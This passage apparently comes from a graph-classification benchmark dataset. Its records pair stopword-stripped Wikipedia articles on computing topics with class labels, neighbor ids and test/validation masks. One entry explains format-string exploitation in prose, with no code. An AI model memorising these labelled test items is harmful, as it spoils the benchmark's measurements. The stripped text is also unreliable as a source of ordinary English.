    "text": "Dual_in-line_package:dual in-line package microelectronics dual in-line package dip dil dual in-line pin package dipp electronic component package rectangular housing two parallel rows electrical connecting pins package may through-hole mounted printed circuit board pcb inserted socket dual-inline format invented forbes rex rice bryant rogers fairchild r 1964 restricted number leads available circular transistor-style packages became limitation use integrated circuits increasingly complex circuits required signal power supply leads observed rent rule eventually microprocessors similar complex devices required leads could put dip package leading development higher-density chip carriers furthermore square rectangular packages made easier route printed-circuit traces beneath packages dip usually referred dip n n total number pins example microcircuit package two rows seven vertical leads would dip14 photograph upper right shows three dip14 ics common packages three many 64 leads many analog digital integrated circuit types available dip packages arrays transistors switches light emitting diodes resistors dip plugs ribbon cables used standard ic sockets dip packages usually made opaque molded epoxy plastic pressed around tin- silver- gold-plated lead frame supports device die provides connection pins types ic made ceramic dip packages high temperature high reliability required device optical window interior package dip packages secured pcb inserting pins holes board soldering place replacement parts necessary test fixtures programmable devices must removed changes dip socket used sockets include zero insertion force mechanism variations dip package include single row pins e.g resistor array possibly including heat sink tab place second row pins types four rows pins two rows staggered side package dip packages mostly displaced surface-mount package types avoid expense drilling holes pcb allow higher density interconnections dips commonly used integrated circuits ics devices dip packages include resistor networks dip switches led segmented bargraph displays electromechanical relays dip connector plugs ribbon cables common computers electronic equipment dallas semiconductor manufactured integrated dip real-time clock rtc modules contained ic chip non-replaceable 10-year lithium battery dip header blocks discrete components could soldered used groups components needed easily removed configuration changes optional features calibration original dual-in-line package invented bryant buck rogers 1964 working fairchild semiconductor first devices 14 pins looked much like today rectangular shape allowed integrated circuits packaged densely previous round packages package well-suited automated assembly equipment pcb could populated scores hundreds ics components circuit board could soldered one time wave soldering machine passed automated testing machines little human labor required dip packages still large respect integrated circuits within end 20th century surface-mount packages allowed reduction size weight systems dip chips still popular circuit prototyping breadboard easily inserted utilized dips mainstream microelectronics industry 1970s 1980s use declined first decade 21st century due emerging new surface-mount technology smt packages plastic leaded chip carrier plcc small-outline integrated circuit soic though dips continued extensive use 1990s still continue used substantially year 2011 passes modern chips available surface-mount package types number companies sell various prototyping adapters allow smt devices used like dip devices through-hole breadboards soldered prototyping boards stripboard perfboard smt pose quite problem least inconvenience prototyping general characteristics smt advantages mass production difficulties prototyping programmable devices like eproms gals dips remained popular many years due easy handling external programming circuitry i.e. dip devices could simply plugged socket programming device however in-system programming isp technology state art advantage dips rapidly losing importance well 1990s devices fewer 20 leads manufactured dip format addition newer formats since 2000 newer devices often unavailable dip format dips mounted either through-hole soldering sockets sockets allow easy replacement device eliminates risk damage overheating soldering generally sockets used high-value large ics cost much socket devices would frequently inserted removed test equipment eprom programmers zero insertion force socket would used dips also used breadboards temporary mounting arrangement education design development device testing hobbyists one-off construction permanent prototyping use point-to-point wiring dips appearance physically inverted part method inspires informal term dead bug style method body housing dip containing ic chip usually made molded plastic ceramic hermetic nature ceramic housing preferred extremely high reliability devices however vast majority dips manufactured via thermoset molding process epoxy mold compound heated transferred pressure encapsulate device typical cure cycles resins less 2 minutes single cycle may produce hundreds devices leads emerge longer sides package along seam parallel top bottom planes package bent downward approximately 90 degrees slightly less leaving angled slightly outward centerline package body soic smt package resembles typical dip appears essentially notwithstanding size scale except bent leads bent upward equal angle become parallel bottom plane package ceramic cerdip packages epoxy grout used hermetically seal two halves together providing air moisture tight seal protect ic die inside plastic dip pdip packages usually sealed fusing cementing plastic halves around leads high degree hermeticity achieved plastic usually somewhat porous moisture process ensure good microscopic seal leads plastic points around perimeter however contaminants usually still kept well enough device operate reliably decades reasonable care controlled environment inside package lower half leads embedded center package rectangular space chamber void ic die cemented leads package extend diagonally inside package positions emergence along periphery points along rectangular perimeter surrounding die tapering go become fine contacts die ultra-fine bond wires barely visible naked human eye welded die periphery contacts bond pads die connecting one lead bond pad making final connection microcircuits external dip leads bond wires usually taut loop upward slightly allow slack thermal expansion contraction materials single bond wire breaks detaches entire ic may become useless top package covers delicate assemblage without crushing bond wires protecting contamination foreign materials usually company logo alphanumeric codes sometimes words printed top package identify manufacturer type made usually year week number sometimes made proprietary information perhaps revision numbers manufacturing plant codes stepping id codes necessity laying leads basically radial pattern single plane die perimeter two rows periphery package main reason dip packages higher lead counts must wider spacing lead rows effectively limits number leads practical dip package may even small die many bond pads e.g chip 15 inverters requiring 32 leads wider dip would still required accommodate radiating leads internally one reasons four-sided multiple rowed packages pgas introduced around early 1980s large dip package dip64 used motorola 68000 cpu long leads inside package pins die making package unsuitable high speed devices types dip devices built differently molded plastic housings straight leads leads extend directly bottom package led displays particularly housing usually hollow plastic box bottom/back open filled around contained electronic components hard translucent epoxy material leads emerge others dip switches composed two plastic housing parts snapped welded glued together around set contacts tiny mechanical parts leads emerging molded-in holes notches plastic several dip variants ics exist mostly distinguished packaging material eproms sold ceramic dips manufactured circular window clear quartz chip die allow part erased ultraviolet light often chips also sold less expensive windowless pdip cerdip packages one-time programmable otp versions windowed windowless packages also used microcontrollers devices containing eprom memory windowed cerdip-packaged eproms used bios rom many early ibm pc clones adhesive label covering window prevent inadvertent erasure exposure ambient light molded plastic dips much lower cost ceramic packages one 1979 study showed plastic 14 pin dip cost around us 0.63 ceramic package cost us 0.82 single in-line pin package sip sipp one row connecting pins popular dip used packaging ram chips multiple resistors common pin compared dips typical maximum i/o count 64 sips typical maximum i/o count 24 lower package costs one variant single in-line package uses part lead frame heat sink tab multi-leaded power package useful applications audio power amplifiers example rockwell used quad in-line package 42 leads formed staggered rows pps-4 microprocessor family introduced 1973 microprocessors microcontrollers higher lead counts early 1990s qip sometimes called qil package dimensions dil package leads side bent alternating zigzag configuration fit four lines solder pads instead two dil qil design increased spacing solder pads without increasing package size two reasons qil packaged ics added heatsinking tabs ha1306 intel 3m developed ceramic leadless quad in-line package quip introduced 1979 boost microprocessor density economy ceramic leadless quip designed surface-mount use requires socket used intel iapx 432 microprocessor chip set zilog z8-02 external-rom prototyping version z8 microcontroller commonly found dip packages conform jedec standards use inter-lead spacing lead pitch jedec ms-001ba row spacing varies depending lead counts 0.3 7.62 mm jedec ms-001 0.6 inch 15.24 mm jedec ms-011 common less common standardized row spacings include 0.4 inch 10.16 mm jedec ms-010 0.9 inch 22.86 mm well row spacing 0.3 inch 0.6 inch 0.75 inch 0.07 inch 1.778 mm lead pitch former soviet union eastern bloc countries used similar packages metric pin-to-pin spacing 2.5 mm rather number leads always even 0.3 inch spacing typical lead counts 8 14 16 18 28 less common 4 6 20 24 lead counts even number leads dips unused connected nc leads internal chip duplicated e.g two ground pins 0.6 inch spacing typical lead counts 24 28 32 40 less common 36 48 52 64 lead counts microprocessors motorola 68000 zilog z180 used lead counts high 64 typically maximum number leads dip package shown diagram leads numbered consecutively pin 1 identifying notch package top pin 1 top left corner device sometimes pin 1 identified indent paint dot mark example 14-lead dip notch top left leads numbered 1 7 top bottom right row leads numbered 8 14 bottom top dip devices segmented led displays relays replace leads heat sink fin skip leads remaining leads numbered positions leads addition providing human visual identification orientation package notch allows automated chip-insertion machinery confirm correct orientation chip mechanical sensing soic small outline ic surface-mount package currently popular particularly consumer electronics personal computers essentially shrunk version standard ic pdip fundamental difference makes smt device second bend leads flatten parallel bottom plane plastic housing soj small outline j-lead smt packages sop small outline package names considered relatives dip original ancestor soic packages tend half pitch dip sop half fourth dip 0.1 /2.54 mm 0.05 /1.27 mm 0.025 /0.635 mm respectively pin grid array pga packages may considered evolved dip pgas pin centers dips popular microprocessors early mid-1980s 1990s owners personal computers containing intel 80286 p5 pentium processors may familiar pga packages often inserted zif sockets motherboards similarity pga socket may physically compatible dip devices though converse rarely true",
    "neighbors": [
      9861,
      1170,
      8851,
      7445,
      4246,
      664,
      4252,
      10784,
      4385,
      5503,
      682,
      4523,
      3886,
      4910,
      6453,
      11447,
      4537,
      2874,
      3010,
      7235,
      4805,
      4179,
      4185,
      3936,
      9570,
      7269,
      1894,
      5862,
      6889,
      1515,
      1260,
      4203,
      8301,
      7151,
      10734,
      7281,
      7284,
      7286,
      10230,
      9592,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 2875,
    "label": 2,
    "text": "Android_Honeycomb:android honeycomb android honeycomb codename eighth version android designed devices larger screen sizes particularly tablets longer supported newer versions honeycomb debuted motorola xoom february 2011 besides addition new features honeycomb introduced new so-called holographic user interface theme interaction model built main features android multitasking notifications widgets new features introduced honeycomb include following",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2876,
    "label": 1,
    "text": "Iris_Recognition_Immigration_System:iris recognition immigration system iris recognition immigration system iris initiative launched 2004 provide automated clearance uk immigration certain frequent travellers functioned one-to-all identification mode searching large database million enrolled frequent travellers see anyone matched presenting iris passenger asked assert identity e.g presenting passport id card would require one-to-one verification test single enrolled identity thus iris exploited great robustness iris recognition making false matches since unlike weak biometrics face recognition could survive vast number opportunities make false matches searching large database instead needing test single asserted identity decommissioned september 2013 favour e-passport entry using biometric data stored e-passport chip requires single asserted identity tested thus could function using weaker biometrics simple one-to-one verification mode iris relied biometric technology authenticate identity part e-borders initiative uk government claimed passengers found system difficult use resulting many false rejections required passengers join normal queue passport presentation main factor behind decision decommission iris cost staffing enrolment offices airport terminals whereas face recognition required submitting passport-type photograph acquired photo-booth without need personal presentation airport enrolment staff system cost £4.9 million develop £4 million operate enrolled passengers could enter uk special automated immigration control barrier incorporating iris recognition camera barriers located certain immigration arrival halls form part immigration passport control enrolment took place airport departure lounge immigration officer assesses eligibility enrols qualifying persons qualified participate scheme eyes photographed order capture iris patterns data stored securely alongside personal details originally iris rolled london heathrow london gatwick birmingham manchester 2004 intended deployment period five years february 2013 iris available heathrow terminals 3 5 barriers decommissioned last operational barriers decommissioned 15 16 september 2013 respectively original deployment plan five years doubled nearly ten years following travellers eligible enrol",
    "neighbors": [
      8038
    ],
    "mask": "Test"
  },
  {
    "node_id": 2877,
    "label": 2,
    "text": "Dynamic_Logical_Partitioning:dynamic logical partitioning dynamic logical partitioning dlpar capability logical partition lpar reconfigured dynamically without shut operating system runs lpar dlpar enables memory cpu capacity i/o interfaces moved nondisruptively lpars within server dlpar supported operating systems aix i5/os almost power4 follow-on power systems since linux kernel power also supported dlpar dynamic reconfiguration capabilities limited cpu capacity pci devices memory october 2009 seven years aix announcement dlpar memory cpu io slots linux finally added capability dlpar memory power systems fundamentals dlpar described ibm systems journal paper titled dynamic reconfiguration basic building blocks autonomic computing ibm pseries servers later power5 processor added enhanced dlpar capabilities including micro-partitioning 10 lpars configured per processor single multiprocessor server supporting maximum 254 lpars thus 254 independent operating system instances many interesting applications dlpar capabilities primarily used build agile infrastructures automate hardware system resource allocation planning provisioning turn results increased system utilization example memory processor i/o slots added removed moved another lpar without rebooting operating system application running lpar ibm db2 application http //www.ibm.com/developerworks/eserver/articles/db2_dlpar.html aware dlpar events automatically tunes changing lpar resources system z9 zseries mainframes operating systems including linux z systems support even sophisticated forms dynamic lpars relevant lpar-related features mainframe platforms include intelligent resource director sysplex parallel sysplex geographically dispersed parallel sysplex hipersockets system z9 supports 60 lpars single server mainframes also support additional level virtualization using z/vm ability support thousands operating system instances single server",
    "neighbors": [
      3720,
      7983,
      7733,
      9302,
      1115,
      863
    ],
    "mask": "None"
  },
  {
    "node_id": 2878,
    "label": 4,
    "text": "Uncontrolled_format_string:uncontrolled format string uncontrolled format string type software vulnerability discovered around 1989 used security exploits originally thought harmless format string exploits used crash program execute harmful code problem stems use unchecked user input format string parameter certain c functions perform formatting codice_1 malicious user may use codice_2 codice_3 format tokens among others print data call stack possibly locations memory one may also write arbitrary data arbitrary locations using codice_4 format token commands codice_1 similar functions write number bytes formatted address stored stack typical exploit uses combination techniques take control instruction pointer ip process example forcing program overwrite address library function return address stack pointer malicious shellcode padding parameters format specifiers used control number bytes output codice_3 token used pop bytes stack beginning format string reached start format string crafted contain address codice_4 format token overwrite address malicious code execute common vulnerability format bugs previously thought harmless resulted vulnerabilities many common tools mitre cve project lists roughly 500 vulnerable programs june 2007 trend analysis ranks 9th most-reported vulnerability type 2001 2006 format string bugs commonly appear programmer wishes output string containing user supplied data either file buffer user programmer may mistakenly write codice_8 instead codice_9 first version interprets codice_10 format string parses formatting instructions may contain second version simply prints string screen programmer intended versions behave identically absence format specifiers string makes easy mistake go unnoticed developer format bugs arise c argument passing conventions type-safe particular codice_11 mechanism allows functions accept number arguments e.g codice_12 popping many arguments call stack wish trusting early arguments indicate many additional arguments popped types format string bugs occur programming languages besides c perl although appear less frequency usually exploited execute code attacker choice format bugs first noted 1989 fuzz testing work done university wisconsin discovered interaction effect c shell csh command history mechanism error routine assumed safe string input use format string bugs attack vector discovered september 1999 tymm twillman security audit proftpd daemon audit uncovered codice_13 directly passed user-generated data without format string extensive tests contrived arguments printf-style functions showed use privilege escalation possible led first posting september 1999 bugtraq mailing list regarding class vulnerabilities including basic exploit still several months however security community became aware full dangers format string vulnerabilities exploits software using method began surface first exploits brought issue common awareness providing remote root access via code execution published simultaneously bugtraq list june 2000 przemysław frasunek person using nickname tf8 seminal paper format string attacks tim newsham published september 2000 detailed technical explanation papers published september 2001 exploiting format string vulnerabilities team teso many compilers statically check format strings produce warnings dangerous suspect formats gnu compiler collection relevant compiler flags codice_14 codice_15 codice_16 codice_17 codice_18 codice_19 useful detecting bad format strings known compile-time format string may come user source external application application must validate format string using care must also taken application generates selects format strings fly gnu c library used codice_20 parameter used detect certain types attacks occurring run-time codice_18 check stringent contrary many security issues root cause format string vulnerabilities relatively easy detect x86-compiled executables codice_12-family functions proper use implies separate argument format string arguments formatted faulty uses functions spotted simply counting number arguments passed function 'argument deficiency strong indicator function misused counting number arguments often made easy x86 due calling convention caller removes arguments pushed onto stack adding stack pointer call simple examination stack correction yields number arguments passed codice_12-family function",
    "neighbors": [
      6273,
      899,
      5636,
      6423,
      1820,
      2975,
      7717,
      1062,
      939,
      5040,
      3391,
      1474,
      584,
      4689,
      1746,
      4562,
      2262,
      4572,
      6497,
      4198,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2879,
    "label": 4,
    "text": "Secure_Network:secure network secure network small research consulting company focusing information security based milano italy london united kingdom besides notability italy received international exposure research project bluetooth security co-sponsored f-secure codenamed bluebag also selected black hat briefings conference 2006 las vegas 2009 also organized seacure.it first international technical security conference ever held italy",
    "neighbors": [
      9537,
      939,
      2275
    ],
    "mask": "Test"
  },
  {
    "node_id": 2880,
    "label": 9,
    "text": "List_of_server-side_JavaScript_implementations:list server-side javascript implementations list server-side javascript implementations common server-side programming languages javaserver pages jsp active server pages asp perl php python ruby coldfusion others",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      8582,
      8584,
      10507,
      8854,
      4378,
      8858,
      8605,
      7455,
      803,
      3761,
      11060,
      438,
      5048,
      5311,
      7871,
      9152,
      8644,
      11087,
      11343,
      339,
      84,
      4822,
      4439,
      4056,
      3545,
      9560,
      603,
      9561,
      865,
      482,
      8289,
      7396,
      4326,
      487,
      8554,
      5483,
      9195,
      10991,
      10097,
      4604,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 2881,
    "label": 9,
    "text": "Krivine_machine:krivine machine theoretical computer science krivine machine abstract machine sometimes called virtual machine abstract machine shares features turing machines secd machine krivine machine explains compute recursive function specifically aims define rigorously head normal form reduction lambda term using call-by-name reduction thanks formalism tells details kind reduction works sets theoretical foundation operational semantics functional programming languages hand krivine machine implements call-by-name evaluates body β-redex evaluates parameter words expression λ x u evaluates first λ x evaluating u functional programming would mean order evaluate function applied parameter evaluates first function evaluating parameter krivine machine designed french logician beginning 1980s krivine machine based two concepts related lambda calculus namely head reduction call name redex one says also β-redex term lambda calculus form λ x u term shape λ x u ... u said head redex head normal form term lambda calculus head redex head reduction non empty sequence contractions term contracts head redexes head reduction term supposed head normal form head reduction starts term ends head normal form abstract point view head reduction way program computes evaluates recursive sub-program understand reduction implemented important one aims krivine machine propose process reduct term head normal form describe formally process like turing used abstract machine describe formally notion algorithm used abstract machine describe formally notion head normal form reduction term λ 0 λ 0 λ 0 corresponds one uses explicit variables term λx x λy λz z head normal form λ 0 λ 0 contracts λ 0 yielding head redex λ 0 λ 0 contracts λ 0 therefore head normal form λ 0 λ 0 λ 0 said otherwise head normal form contraction corresponds see krivine machine reduces term λ 0 λ 0 λ 0 implement head reduction term u v application redex one must reduce body u exhibit abstraction therefore create redex v redex appears one reduces reduce always body application first called call name krivine machine implements call name presentation krivine machine given based notations lambda terms use de bruijn indices assumes terms computes head normal forms closed modifies current state anymore case obtains head normal form head normal form represents result computation yields error meaning term started correct however enter infinite sequence transitions means term attempts reducing head normal form corresponds non terminating computation proved krivine machine implements correctly call name head normal form reduction lambda-calculus moreover krivine machine deterministic since pattern state corresponds one machine transition state three components term λ-term de bruijn indices stack environment belong recursive data structure precisely environment stack lists pairs term environment called closures follows insertion head list ℓ stack environment element written ℓ whereas empty list written □ stack location machine stores closures must evaluated furthermore whereas environment association indices closures given time evaluation first element environment closure associated index 0 second element corresponds closure associated index 1 etc machine evaluate index fetches pair term environment closure yields term evaluated environment term must evaluated intuitive explanations allow understanding operating rules machine one writes term p stack e environment states associated three entities written p e. rules explain machine transforms state another state identifying patterns among states initial state aims evaluate term state □ □ term stack environment empty final state absence error form λ □ e words resulting terms abstraction together environment empty stack krivine machine four transitions app abs zero succ transition app removes parameter application put stack evaluation transition abs removes λ term pop closure top stack put top environment closure corresponds de bruijn index 0 new environment transition zero takes first closure environment term closure becomes current term environment closure becomes current environment transition succ removes first closure environment list decreases value index let us evaluate term λ 0 0 λ 0 corresponds term λ x x x λ x x let us start state λ 0 0 λ 0 □ □ conclusion head normal form term λ 0 0 λ 0 λ 0 translates variables head normal form term λ x x x λ x x λ x x let us evaluate term λ 0 λ 0 λ 0 confirms fact normal form term λ 0 λ 0 λ 0 λ 0 content edit translated existing french wikipedia article see history attribution",
    "neighbors": [
      2595,
      10403
    ],
    "mask": "None"
  },
  {
    "node_id": 2882,
    "label": 4,
    "text": "Electromagnetic_survivability:electromagnetic survivability telecommunication electromagnetic survivability ability system subsystem equipment resume functioning without evidence degradation following temporary exposure adverse electromagnetic environment system subsystem equipment performance may degraded exposure adverse electromagnetic environment system experience permanent damage component burnout prevent proper operation adverse electromagnetic environment removed",
    "neighbors": [
      4223
    ],
    "mask": "Test"
  },
  {
    "node_id": 2883,
    "label": 0,
    "text": "Technolangue/Easy:technolangue/easy technolangue/easy first evaluation campaign syntactic parsers french project supported french research ministry ministère de recherche français technolangue/easy included four tasks 2003 2006 13 laboratories companies submitted parser evaluation making total 16 runs 7 research laboratories 3 r institutes 3 private companies said terms existing french parsers competed",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 2884,
    "label": 4,
    "text": "IP_address_blocking:ip address blocking ip address blocking configuration network service requests hosts certain ip addresses rejected unix-like operating systems commonly implement ip address blocking using tcp wrapper configured host access control files /etc/hosts.deny /etc/hosts.allow ip address blocking commonly used protect brute force attacks companies schools offering remote user access use linux programs denyhosts fail2ban protection unauthorized access allowing permitted remote access also useful allowing remote access computers also used internet censorship website ip address block prevent disruptive address access though warning and/or account block may used first dynamic allocation ip addresses isps complicate incoming ip address blocking rendering difficult block specific user without blocking many ip addresses blocks ip address ranges thereby creating collateral damage ip address blocking used restrict access particular geographic area—for example syndication content specific region achieve ip addresses mapped countries assigned used example target nigerian ip addresses due perception business originating country fraudulent thus making extremely difficult legitimate businesses based country interact counterparts rest world make purchases abroad nigerians must rely proxy servers disguise true origin internet request proxy servers methods used bypass blocking traffic ip addresses however anti-proxy strategies available 2013 united states court ruling case craigslist v. 3taps us federal judge charles r. breyer held circumventing address block access website violation computer fraud abuse act cfaa punishable civil damages unauthorized access",
    "neighbors": [
      4224,
      3717,
      5254,
      10889,
      5387,
      5135,
      9722,
      8211,
      5397,
      11162,
      1692,
      9117,
      3742,
      4772,
      3625,
      4268,
      7859,
      2228,
      8630,
      823,
      3777,
      3781,
      11461,
      5959,
      8265,
      11468,
      7376,
      11606,
      2136,
      9048,
      6490,
      5084,
      2661,
      9318,
      8039,
      9193,
      11248,
      4725,
      5749,
      3322,
      4349,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 2885,
    "label": 9,
    "text": "David_S._Touretzky:david s. touretzky david s. touretzky research professor computer science department center neural basis cognition carnegie mellon university received ba computer science rutgers university 1978 earned master degree ph.d. 1984 computer science carnegie mellon university touretzky worked internet activist favor freedom speech especially perceives abuse legal system government private authorities notable critic scientology touretzky research interests lie fields artificial intelligence computational neuroscience learning includes machine learning animal learning particular neural representation space rodents e.g. hippocampus robots 2006 recognized distinguished scientist association computing machinery since 1990s touretzky worked expose actions church scientology sees actions organization threat free speech taken prominent part internet-based activism oppose also appearing regularly critic radio print also worked expose sees dangerous potentially life-threatening treatments provided narconon scientology-based drug rehabilitation program maintains web site named stop narconon archives media articles critical program dr. touretzky research narconon primary source information series san francisco chronicle newspaper articles criticizing narconon june 9 june 10 2004 ultimately led organization program rejected california school system early 2005 touretzky undertaken extensive research secret upper levels scientology made information available public ot iii scholarship page concerning xenu nots scholars page concerning higher operating thetan levels pages states academic studies scientology texts proprietary materials therefore legally available due careful application academic fair use provisions copyright law church failed attempts removed repeatedly threatening touretzky lawsuits filing complaints carnegie mellon university carnegie mellon turn issued statements support professor touretzky noting criticism scientology personal affair opinion university touretzky object public attacks church scientology including various dead agent campaigns accused religious bigotry racism misogyny misuse government funds support terrorism collusion pharmaceutical industry among misdeeds david touretzky internet free speech activist supported several movements perceives abuse legal system government private authorities 2000 touretzky testified expert witness defense universal city studios et al v. reimerdes et al. suit brought seven motion picture studios publishers case name refers shawn reimerdes unrelated defendant settled prior trial suit concerned publication dvd decryption software known decss plaintiffs asserted illegal digital millennium copyright act dr. touretzky testified expert computer science expressive nature computer code convinced court code indeed speech touretzky also created online gallery various renditions decss software readers sent renditions decryption algorithm including mathematical description haiku square dance reaction federal prosecution eventual imprisonment 18-year-old political activist sherman austin hosting bomb-making instructions entitled reclaim guide web site dr. touretzky provided mirror carnegie mellon website two years although acknowledged website reposting information violate plain language statute austin convicted may 2004 avoid harassment university controversy media dr. touretzky moved mirror carnegie mellon server private site 2011 touretzky began hosting mirror website george hotz containing executable files instructions facilitating jailbreaking sony playstation 3 sony filed lawsuits hotz hackers aiming utilize takedown provisions dmca remove content internet",
    "neighbors": [
      2370,
      7239,
      8937,
      5611,
      8589,
      2062,
      9518,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 2886,
    "label": 7,
    "text": "Pdfvue:pdfvue pdfvue online pdf viewer editor beta release features include viewing commenting annotations page deletion rotation adding fillable form fields pdfs supported browsers include internet explorer firefox safari pdfs uploaded directly imported web address firefox extension redirects pdfs enabling viewing annotation within browser deskpdf pdfvue ramp release also features print pdfvue functionality allowing printable file uploaded pdfvue via print process postscript technology software renamed pdfzen primary features beta release include tools creating filling forms sharing collaborating documents annotating existing pdfs additional functionality includes ability delete rotate pages within pdf pdfvue typewriter tool allows text added pdf allows forms created without fillable fields filled well documents scanned without ocr available annotation tools include addition able fill forms pdfvue features tools creating digital forms current supported fillable form fields include editing pdfs downloaded locally viewed pdf viewer pdfvue also allows pdfs shared via providing hyperlink hosted pdf alternative email attachments annotation tools allows collaboration take place single pdf rather multiple versions shared parties firefox extension renders pdfs using pdfvue servers thus avoiding acrobat plug-in freeze-up well acrobat reader exploits enabled extensions traps url requests low level catching pdfs clicks redirects new tabs address bar providing better level protection unintended pdf launch opened pdfvue.com pdf marked changes saved service available mozilla add ons free charge pdfvue onramp local documents automatically uploaded pdfvue converted text searchable pdf commenting sharing",
    "neighbors": [
      9418,
      5612,
      1295,
      7983,
      2513,
      8627,
      3828,
      8628,
      5078,
      1822
    ],
    "mask": "None"
  },
  {
    "node_id": 2887,
    "label": 5,
    "text": "Domain_Name_System:domain name system domain name system dns hierarchical decentralized naming system computers services resources connected internet private network associates various information domain names assigned participating entities prominently translates readily memorized domain names numerical ip addresses needed locating identifying computer services devices underlying network protocols providing worldwide distributed directory service domain name system essential component functionality internet since 1985 domain name system delegates responsibility assigning domain names mapping names internet resources designating authoritative name servers domain network administrators may delegate authority sub-domains allocated name space name servers mechanism provides distributed fault-tolerant service designed avoid single large central database domain name system also specifies technical functionality database service core defines dns protocol detailed specification data structures data communication exchanges used dns part internet protocol suite internet maintains two principal namespaces domain name hierarchy internet protocol ip address spaces domain name system maintains domain name hierarchy provides translation services address spaces internet name servers communication protocol implement domain name system dns name server server stores dns records domain dns name server responds answers queries database common types records stored dns database start authority soa ip addresses aaaa smtp mail exchangers mx name servers ns pointers reverse dns lookups ptr domain name aliases cname although intended general purpose database dns expanded time store records types data either automatic lookups dnssec records human queries responsible person rp records general purpose database dns also used combating unsolicited email spam storing real-time blackhole list rbl dns database traditionally stored structured text file zone file database systems common often-used analogy explain domain name system serves phone book internet translating human-friendly computer hostnames ip addresses example domain name www.example.com translates addresses ipv4 ipv6 dns quickly transparently updated allowing service location network change without affecting end users continue use hostname users take advantage use meaningful uniform resource locators urls e-mail addresses without know computer actually locates services important ubiquitous function dns central role distributed internet services cloud services content delivery networks user accesses distributed internet service using url domain name url translated ip address server proximal user key functionality dns exploited different users simultaneously receive different translations domain name key point divergence traditional phone-book view dns process using dns assign proximal servers users key providing faster reliable responses internet widely used major internet services dns reflects structure administrative responsibility internet subdomain zone administrative autonomy delegated manager zones operated registry administrative information often complemented registry rdap whois services data used gain insight track responsibility given host internet using simpler memorable name place host numerical address dates back arpanet era stanford research institute sri international maintained text file named hosts.txt mapped host names numerical addresses computers arpanet elizabeth feinler developed maintained first arpanet directory maintenance numerical addresses called assigned numbers list handled jon postel university southern california information sciences institute isi whose team worked closely sri addresses assigned manually computers including hostnames addresses added master file contacting sri network information center nic directed elizabeth feinler telephone business hours later feinler set whois directory server nic retrieval information resources contacts entities team developed concept domains feinler suggested domains based location physical address computer computers educational institutions would domain edu example team managed host naming registry 1972 1989 early 1980s maintaining single centralized host table become slow unwieldy emerging network required automated naming system address technical personnel issues postel directed task forging compromise five competing proposals solutions paul mockapetris mockapetris instead created domain name system internet engineering task force published original specifications rfc 882 rfc 883 november 1983 1984 four uc berkeley students douglas terry mark painter david riggle songnian zhou wrote first unix name server implementation berkeley internet name domain commonly referred bind 1985 kevin dunlap dec substantially revised dns implementation mike karels phil almquist paul vixie maintained bind since early 1990s bind ported windows nt platform widely distributed especially unix systems still widely used dns software internet november 1987 rfc 1034 rfc 1035 superseded 1983 dns specifications several additional request comments proposed extensions core dns protocols domain name space consists tree data structure node leaf tree label zero resource records rr hold information associated domain name domain name consists label possibly concatenated name parent node right separated dot tree sub-divides zones beginning root zone dns zone may consist one domain may consist many domains sub-domains depending administrative choices zone manager dns also partitioned according class separate classes thought array parallel namespace trees administrative responsibility zone may divided creating additional zones authority new zone said delegated designated name server parent zone ceases authoritative new zone definitive descriptions rules forming domain names appear rfc 1035 rfc 1123 rfc 2181 rfc 5892 domain name consists one parts technically called labels conventionally concatenated delimited dots example.com right-most label conveys top-level domain example domain name www.example.com belongs top-level domain com hierarchy domains descends right left label left specifies subdivision subdomain domain right example label example specifies subdomain com domain www subdomain example.com tree subdivisions may 127 levels label may contain zero 63 characters null label length zero reserved root zone full domain name may exceed length 253 characters textual representation internal binary representation dns maximum length requires 255 octets storage also stores length name although technical limitation exists use character domain name labels representable octet hostnames use preferred format character set characters allowed labels subset ascii character set consisting characters z z digits 0 9 hyphen rule known ldh rule letters digits hyphen domain names interpreted case-independent manner labels may start end hyphen additional rule requires top-level domain names all-numeric limited set ascii characters permitted dns prevented representation names words many languages native alphabets scripts make possible icann approved internationalizing domain names applications idna system user applications web browsers map unicode strings valid dns character set using punycode 2009 icann approved installation internationalized domain name country code top-level domains cctld addition many registries existing top-level domain names tld adopted idna system guided rfc 5890 rfc 5891 rfc 5892 rfc 5893 domain name system maintained distributed database system uses client–server model nodes database name servers domain least one authoritative dns server publishes information domain name servers domains subordinate top hierarchy served root name servers servers query looking resolving tld authoritative name server name server gives answers dns queries data configured original source example domain administrator dynamic dns methods contrast answers obtained via query another name server maintains cache data authoritative name server either master server slave server master server server stores original master copies zone records slave server uses special automatic updating mechanism dns protocol communication master maintain identical copy master records every dns zone must assigned set authoritative name servers set servers stored parent domain zone name server ns records authoritative server indicates status supplying definitive answers deemed authoritative setting protocol flag called authoritative answer aa bit responses flag usually reproduced prominently output dns administration query tools dig indicate responding name server authority domain name question domain name resolvers determine domain name servers responsible domain name question sequence queries starting right-most top-level domain label proper operation domain name resolver network host configured initial cache hints known addresses root name servers hints updated periodically administrator retrieving dataset reliable source assuming resolver cached records accelerate process resolution process starts query one root servers typical operation root servers answer directly respond referral authoritative servers e.g. query www.wikipedia.org referred org servers resolver queries servers referred iteratively repeats process receives authoritative answer diagram illustrates process host named fully qualified domain name www.wikipedia.org mechanism would place large traffic burden root servers every resolution internet required starting root practice caching used dns servers off-load root servers result 